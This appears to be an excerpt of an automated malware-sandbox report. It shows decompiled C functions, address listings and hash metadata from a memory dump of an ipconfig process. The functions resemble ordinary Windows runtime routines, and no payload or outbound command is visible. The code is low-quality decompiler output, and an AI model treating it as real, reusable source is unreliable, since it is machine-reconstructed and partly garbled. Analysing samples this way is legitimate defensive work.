              0x00000000
              0x02ec0535
              0x02ec04a6
              0x02f04d2c
              0x02f04d37
              0x02f04d39
              0x02f04d3b
              0x00000000
              0x00000000
              0x02f04d41
              0x02f04d48
              0x02ec0527
              0x02ec052b
              0x02ec052d
              0x02ec0530
              0x02ec0530
              0x00000000
              0x02ec052b
              0x02f04d4e
              0x02ec04ac
              0x02ec04ac
              0x02ec04af
              0x02ec04b2
              0x02ec04b7
              0x02ec04b9
              0x02ec04bb
              0x02ec04bd
              0x02ec04bf
              0x02ec04c5
              0x02ec04c9
              0x02f04d53
              0x02f04d59
              0x02f04db9
              0x02f04dba
              0x02f04dbf
              0x02f04dc2
              0x02f04dc4
              0x02f04dc7
              0x02f04dce
              0x00000000
              0x02f04dce
              0x02f04d5b
              0x02f04d61
              0x00000000
              0x00000000
              0x02f04d63
              0x02f04d69
              0x00000000
              0x00000000
              0x02f04d6b
              0x02f04d6e
              0x02f04d74
              0x02f04d76
              0x02f04d7c
              0x02f04d7e
              0x02f04d84
              0x02f04d89
              0x02f04d8c
              0x02f04d8d
              0x02f04d92
              0x02f04d95
              0x02f04d96
              0x02f04d98
              0x02f04d9a
              0x02f04d9f
              0x02f04da4
              0x02f04da6
              0x02f04da8
              0x02f04daf
              0x02f04db1
              0x02f04db1
              0x02f04daf
              0x02f04da6
              0x02f04d84
              0x02f04d7c
              0x00000000
              0x02f04d74
              0x02ec04d6
              0x02f04de1
              0x02ec04dc
              0x02ec04dc
              0x02ec04dc
              0x02ec04e4
              0x02f04deb
              0x02f04df1
              0x02f04df8
              0x02f04dfe
              0x02f04e03
              0x02f04e05
              0x02f04e17
              0x02f04e07
              0x02f04e10
              0x02f04e10
              0x02f04e1c
              0x02f04e1f
              0x02f04e35
              0x02f04e35
              0x02f04e1f
              0x02f04df8
              0x02ec04f1
              0x02ec04fa
              0x02f04e3f
              0x02f04e47
              0x02f04e5b
              0x02f04e61
              0x02f04e67
              0x02f04e69
              0x02f04e71
              0x02f04e73
              0x02ec0500
              0x02ec0500
              0x02ec0500
              0x02ec04fa
              0x02ec0508
              0x02ec051d
              0x02ec051d
              0x02ec051f
              0x02ec0524
              0x00000000
              0x02ec0524
              0x02ec0515
              0x02ec0517
              0x02f04e7a
              0x02f04e7c
              0x00000000
              0x00000000
              0x02f04e85
              0x00000000
              0x02f04e85
              0x00000000
              0x02ec0517

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 81c32967e7df0bd4e6976ccff2792c154538d4a467957c3c11c33cfcd0d44768
              • Instruction ID: 573eb59a0ff10322453ecc0762f86c813e901b7b4a479c650e5874d9857e199f
              • Opcode Fuzzy Hash: 81c32967e7df0bd4e6976ccff2792c154538d4a467957c3c11c33cfcd0d44768
              • Instruction Fuzzy Hash: 44916A31E80218DFDB319BA8CD84BBEB7A5AB01798F155265EB11AB2D0D7309D01CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E9C600 Relevance: .2, Instructions: 225COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E02E9C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x2f8d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E02EA6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E02EDB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x2f87b9c; // 0x0
					_t74 = L02EB4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E02ED9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L02EB77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E02EDF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E02ED13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L02EB77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E02ED9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































              0x02e9c608
              0x02e9c615
              0x02e9c625
              0x02e9c62d
              0x02e9c635
              0x02e9c640
              0x02e9c680
              0x02e9c687
              0x02e9c688
              0x02e9c689
              0x02e9c694
              0x02e9c694
              0x02e9c642
              0x02e9c64a
              0x02e9c697
              0x02f07a25
              0x02f07a2b
              0x02f07a2e
              0x02f07a30
              0x02f07bea
              0x02f07bea
              0x00000000
              0x02f07bea
              0x02f07a36
              0x02f07a43
              0x02f07a48
              0x02f07a4c
              0x02f07a4e
              0x00000000
              0x00000000
              0x02f07a58
              0x02f07a5a
              0x02f07a5b
              0x02f07a5c
              0x02f07a5d
              0x02f07a63
              0x02f07a64
              0x02f07a6a
              0x02f07a6c
              0x02f07a6e
              0x02f079cb
              0x02f079cb
              0x02f079ce
              0x02f079d0
              0x02f07a98
              0x02f07a9b
              0x02f07a9b
              0x02f07a9e
              0x02f07aa1
              0x02f07bbe
              0x02f07bbe
              0x02f07bc0
              0x02f07be0
              0x02f07be0
              0x02f07a01
              0x02f07a01
              0x02f07a05
              0x02f07a07
              0x02f07a15
              0x02f07a15
              0x02f07a1a
              0x00000000
              0x02f07a1a
              0x02f07bc2
              0x02f07bc6
              0x02f07bc9
              0x02f07bcd
              0x02f07bcf
              0x02f079e6
              0x02f079e6
              0x02f079eb
              0x02f079eb
              0x02f079ef
              0x02f079f1
              0x00000000
              0x00000000
              0x02f079f3
              0x02f079f5
              0x02f079ff
              0x02f079ff
              0x00000000
              0x02f079ff
              0x02f079f7
              0x02f079fd
              0x00000000
              0x00000000
              0x00000000
              0x02f079fd
              0x02f07bd5
              0x02f07bd8
              0x00000000
              0x00000000
              0x02f07ba9
              0x02f07bac
              0x02f07bb0
              0x02f07bb1
              0x02f07bb1
              0x02f07bb6
              0x00000000
              0x02f07bb6
              0x02f07aa7
              0x02f07aaa
              0x00000000
              0x00000000
              0x02f07ab2
              0x02f07ab3
              0x02f07ab5
              0x02f07aec
              0x02f07aef
              0x02f07b25
              0x02f07b28
              0x02f07b62
              0x02f07b64
              0x02f07b8f
              0x02f07b92
              0x02f07b96
              0x02f07b98
              0x00000000
              0x00000000
              0x02f07b9e
              0x02f07b9f
              0x02f07ba3
              0x00000000
              0x02f07ba3
              0x02f07b66
              0x02f07b68
              0x02f07ae2
              0x02f07ae2
              0x00000000
              0x02f07ae2
              0x02f07b6e
              0x02f07b72
              0x02f07b75
              0x02f07b81
              0x02f07b85
              0x02f07b87
              0x00000000
              0x00000000
              0x02f07b31
              0x02f07b34
              0x02f07b3c
              0x02f07b45
              0x02f07b46
              0x02f07b4f
              0x02f07b51
              0x02f07b57
              0x02f07b59
              0x02f07b59
              0x00000000
              0x02f07b59
              0x02f07b77
              0x00000000
              0x02f07b77
              0x02f07b2a
              0x00000000
              0x02f07b2a
              0x02f07af1
              0x02f07af3
              0x00000000
              0x00000000
              0x02f07afb
              0x02f07afc
              0x02f07afe
              0x00000000
              0x00000000
              0x02f07b00
              0x02f07b03
              0x00000000
              0x00000000
              0x02f07b05
              0x02f07b09
              0x02f07b0d
              0x02f07b0f
              0x00000000
              0x00000000
              0x02f07b18
              0x02f07b1d
              0x00000000
              0x02f07b1d
              0x02f07ab7
              0x02f07ab9
              0x00000000
              0x00000000
              0x02f07abf
              0x02f07ac1
              0x00000000
              0x00000000
              0x02f07ac3
              0x02f07ac6
              0x00000000
              0x00000000
              0x02f07ac8
              0x02f07acc
              0x02f07ad0
              0x02f07ad2
              0x00000000
              0x00000000
              0x02f07adb
              0x00000000
              0x02f07adb
              0x02f079d6
              0x02f079d9
              0x02f079dc
              0x02f07a91
              0x02f07a94
              0x00000000
              0x02f07a94
              0x02f079e2
              0x00000000
              0x02f079e2
              0x02f07a74
              0x02f07a7a
              0x00000000
              0x00000000
              0x02f07a8a
              0x02f07a21
              0x02f07a21
              0x00000000
              0x02f07a21
              0x02e9c650
              0x02e9c651
              0x02e9c656
              0x02e9c65c
              0x02e9c65d
              0x02e9c663
              0x02e9c664
              0x02e9c66a
              0x02e9c66e
              0x02f079c5
              0x02f079c7
              0x00000000
              0x02f079c7
              0x02e9c67a
              0x00000000
              0x00000000
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4d5c34a10e7ce2889f24dba1d8cd157f3cb88d81ea60477fb561eb76fbabab25
              • Instruction ID: 8cdc10cb2067d8181c2d93ca046f144ca84cade371f9729078767dc4a090d911
              • Opcode Fuzzy Hash: 4d5c34a10e7ce2889f24dba1d8cd157f3cb88d81ea60477fb561eb76fbabab25
              • Instruction Fuzzy Hash: 9381B576A442458BCB11EE15C8D0B7BF3A5FB88394F14889AFE459B294D330FD41DB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F2B8D0 Relevance: .2, Instructions: 199COMMON
              Download Yara Rule
              C-Code - Quality: 39%
              			E02F2B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x2f87b9c; // 0x0
				_t124 = L02EB4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E02ED9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E02ED95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E02ED95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L02EB77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E02ED9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E02ED95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x2f87b9c; // 0x0
									_t92 = L02EB4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E02ED9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E02E9A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E02F2E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E02F2E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E02ED95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















              0x02f2b8d9
              0x02f2b8e4
              0x00000000
              0x02f2b8e6
              0x02f2b8f3
              0x02f2b8f5
              0x02f2b8f5
              0x02f2b8f8
              0x02f2b920
              0x02f2b924
              0x02f2b936
              0x02f2b939
              0x02f2b93d
              0x02f2b948
              0x02f2b9a0
              0x02f2b9a0
              0x02f2b9a4
              0x02f2b9bf
              0x02f2b9c4
              0x02f2b9c6
              0x02f2b9cd
              0x02f2b9d1
              0x02f2bad4
              0x02f2bad8
              0x02f2bada
              0x02f2badc
              0x02f2badc
              0x02f2badf
              0x02f2bae0
              0x02f2bae2
              0x02f2bae4
              0x02f2baec
              0x02f2baee
              0x02f2baf0
              0x02f2baf0
              0x02f2baec
              0x02f2bafb
              0x02f2bafc
              0x02f2bafe
              0x02f2bb01
              0x02f2bb01
              0x00000000
              0x02f2bb06
              0x02f2b9d7
              0x02f2b9db
              0x02f2b9db
              0x02f2b9de
              0x02f2b9de
              0x02f2b9e4
              0x02f2b9e7
              0x02f2b9ea
              0x02f2b9ec
              0x02f2b9ef
              0x02f2b9f3
              0x02f2ba1b
              0x02f2ba1b
              0x02f2ba23
              0x02f2ba24
              0x02f2ba27
              0x02f2ba2a
              0x02f2ba2b
              0x02f2ba2e
              0x02f2ba30
              0x02f2ba37
              0x02f2ba3f
              0x02f2ba9c
              0x02f2baa2
              0x02f2bb13
              0x02f2bb15
              0x02f2baae
              0x02f2baae
              0x02f2bab3
              0x02f2bab5
              0x02f2baba
              0x02f2bac8
              0x02f2bac8
              0x02f2baba
              0x02f2bacd
              0x02f2bacf
              0x00000000
              0x02f2bacf
              0x02f2bb1a
              0x00000000
              0x02f2bb1c
              0x02f2baa7
              0x02f2bb11
              0x00000000
              0x02f2bb11
              0x02f2baa9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02f2ba41
              0x02f2ba41
              0x02f2ba41
              0x02f2ba58
              0x02f2ba5d
              0x02f2ba62
              0x00000000
              0x00000000
              0x02f2ba64
              0x02f2ba67
              0x02f2ba68
              0x02f2ba69
              0x02f2ba6c
              0x02f2ba6f
              0x02f2ba71
              0x02f2ba78
              0x02f2ba80
              0x00000000
              0x00000000
              0x02f2ba90
              0x02f2ba90
              0x02f2ba97
              0x00000000
              0x02f2ba97
              0x02f2b9f5
              0x02f2b9f7
              0x02f2b9f7
              0x02f2b9fa
              0x02f2ba03
              0x02f2ba07
              0x02f2ba0c
              0x02f2ba10
              0x02f2ba17
              0x00000000
              0x02f2b9f7
              0x02f2b9a6
              0x02f2b9a8
              0x02f2b9af
              0x02f2b9b3
              0x00000000
              0x00000000
              0x02f2b9b9
              0x00000000
              0x02f2b9b9
              0x02f2b94d
              0x02f2b98f
              0x02f2b995
              0x02f2b999
              0x02f2b960
              0x02f2b967
              0x02f2b968
              0x02f2b96a
              0x00000000
              0x02f2b96a
              0x02f2b99b
              0x02f2b99e
              0x00000000
              0x00000000
              0x00000000
              0x02f2b99e
              0x02f2b951
              0x02f2b954
              0x02f2b95a
              0x02f2b95e
              0x02f2b972
              0x02f2b979
              0x02f2b97d
              0x02f2b97f
              0x02f2b980
              0x02f2b982
              0x02f2b984
              0x00000000
              0x02f2b984
              0x00000000
              0x02f2b926
              0x00000000
              0x02f2b926

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ab22c56647dd8d86c437f4516762ee11a7156084390673df3c0cf166ff384936
              • Instruction ID: 9730904940c45abd138bc83a6fd6559c12022d94fe537b7dc2074cd7eb2d49ad
              • Opcode Fuzzy Hash: ab22c56647dd8d86c437f4516762ee11a7156084390673df3c0cf166ff384936
              • Instruction Fuzzy Hash: A7713132640711AFD731CF14CC44F66B7A6EF417A8F108928EB559B6E0DB71E949CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F16DC9 Relevance: .2, Instructions: 199COMMON
              Download Yara Rule
              C-Code - Quality: 79%
              			E02F16DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E02F16B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E02EB7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E02ED9AE0();
					_t87 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E02F1795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E02F1795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E02F1795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E02F1795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L02EB4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E02F16B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E02F16B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E02F16B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E02F16B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E02EB7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E02ED9AE0();
								L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L02EB2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L02EB2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L02EB2400( &_v52);
							}
							if(_v28 >= 0) {
								return L02EB2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































              0x02f16dd4
              0x02f16dde
              0x02f16de1
              0x02f16de3
              0x02f16de6
              0x02f16de9
              0x02f16dec
              0x02f16def
              0x02f16df2
              0x02f16df5
              0x02f16dfe
              0x02f16e04
              0x02f16e09
              0x02f16e0d
              0x02f16e18
              0x02f16e1b
              0x02f16e22
              0x02f16e2d
              0x02f16e30
              0x02f16e36
              0x02f16e42
              0x02f16e4d
              0x02f16e50
              0x02f16e55
              0x02f16e5c
              0x02f16e6e
              0x02f16e5e
              0x02f16e67
              0x02f16e67
              0x02f16e73
              0x02f16e74
              0x02f16e77
              0x02f16e7c
              0x02f16e7d
              0x02f16e8e
              0x02f16e93
              0x02f16e9c
              0x02f16ea8
              0x02f16eab
              0x02f16eac
              0x02f16eb3
              0x02f16ecd
              0x02f16edc
              0x02f16ee2
              0x02f16ee5
              0x02f16ef2
              0x02f16efb
              0x02f16f01
              0x02f16f06
              0x02f16f0b
              0x02f16f11
              0x02f16f1a
              0x02f16f22
              0x02f16f26
              0x02f16f26
              0x02f16f33
              0x02f16f41
              0x02f16f44
              0x02f16f47
              0x02f16f54
              0x02f16f65
              0x02f16f77
              0x02f16f7c
              0x02f16f82
              0x02f16f91
              0x02f16f99
              0x02f16fa3
              0x02f16fae
